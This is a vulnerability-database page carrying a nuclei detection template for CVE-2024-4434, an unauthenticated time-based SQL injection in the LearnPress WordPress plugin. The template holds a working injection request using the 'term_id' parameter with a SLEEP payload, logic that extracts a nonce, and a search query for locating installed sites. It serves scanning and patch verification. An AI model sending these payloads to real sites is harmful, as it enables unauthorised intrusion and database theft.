Lucene search
K

LearnPress WordPress LMS Plugin <= 4.2.6.5 - SQL Injection

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 49 Views

LearnPress WordPress LMS Plugin SQL Injection vulnerability up to version 4.2.6.

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
WordPress plugin LearnPress 安全漏洞
14 May 202400:00
cnnvd
CVE
CVE-2024-4434
10 May 202408:32
cve
Cvelist
CVE-2024-4434 LearnPress – WordPress LMS Plugin <= 4.2.6.5 - Unauthenticated Time-Based SQL Injection
10 May 202408:32
cvelist
NVD
CVE-2024-4434
14 May 202415:43
nvd
OSV
CVE-2024-4434
14 May 202415:43
osv
Patchstack
WordPress LearnPress Plugin <= 4.2.6.5 is vulnerable to SQL Injection
10 May 202400:00
patchstack
Patchstack
WordPress LearnPress plugin <= 4.2.6.5 - Unauthenticated Time-Based SQL Injection vulnerability
10 May 202402:11
patchstack
Positive Technologies
PT-2024-31134
10 May 202400:00
ptsecurity
RedhatCVE
CVE-2024-4434
5 Feb 202500:19
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2024-4434
10 May 202400:00
vulncheck_kev
Rows per page
id: CVE-2024-4434

info:
  name: LearnPress WordPress LMS Plugin <= 4.2.6.5 - SQL Injection
  author: s4e-io
  severity: critical
  description: |
    The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the ‘term_id’ parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Unauthenticated attackers can execute time-based SQL injection to extract sensitive database information.
  remediation: |
    Update LearnPress to version 4.2.6.6 or later.
  reference:
    - https://inky-knuckle-2c2.notion.site/Unauthenticated-SQLI-in-Learnpress-plugin-Version-4-2-6-5-a86fe63bcc7b4c9988802688211817fd
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-wordpress-lms-plugin-4265-unauthenticated-time-based-sql-injection
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4434
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-4434
    epss-score: 0.36925
    epss-percentile: 0.98322
    cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:wordpress:*:*:*
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/plugins/learnpress"
    product: learnpress
    vendor: thimpress
  tags: cve,cve2024,wp,wp-plugin,wordpress,sqli,learnpress,vkev,vuln

variables:
  num: "{{rand_int(10000, 99999)}}"

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        @timeout 20s
        POST /wp-json/lp/v1/courses/archive-course?term_id={{num}})+OR+SLEEP(6)+--+A HTTP/1.1
        Host: {{Hostname}}
        X-WP-Nonce: {{nonce}}

    matchers:
      - type: dsl
        dsl:
          - "duration_2 >= 6"
          - "status_code_2 == 200"
          - 'contains(content_type,"application/json")'
          - 'contains_all(body_2,"No courses were found","success")'
        condition: and

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - '"nonce":"([a-z0-9]+)","is_course_archive"'
        internal: true
# digest: 4b0a004830460221008fd58e633b0a95fd2d18d783c75df5df5a6646f46f232546c4d2adf843e5e02c022100ae2d1b40dcbc4dea827ce3f1d9deda63ca3b4ec6f635591cc1f421e153a6471d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.19.8
EPSS0.36925
SSVC
49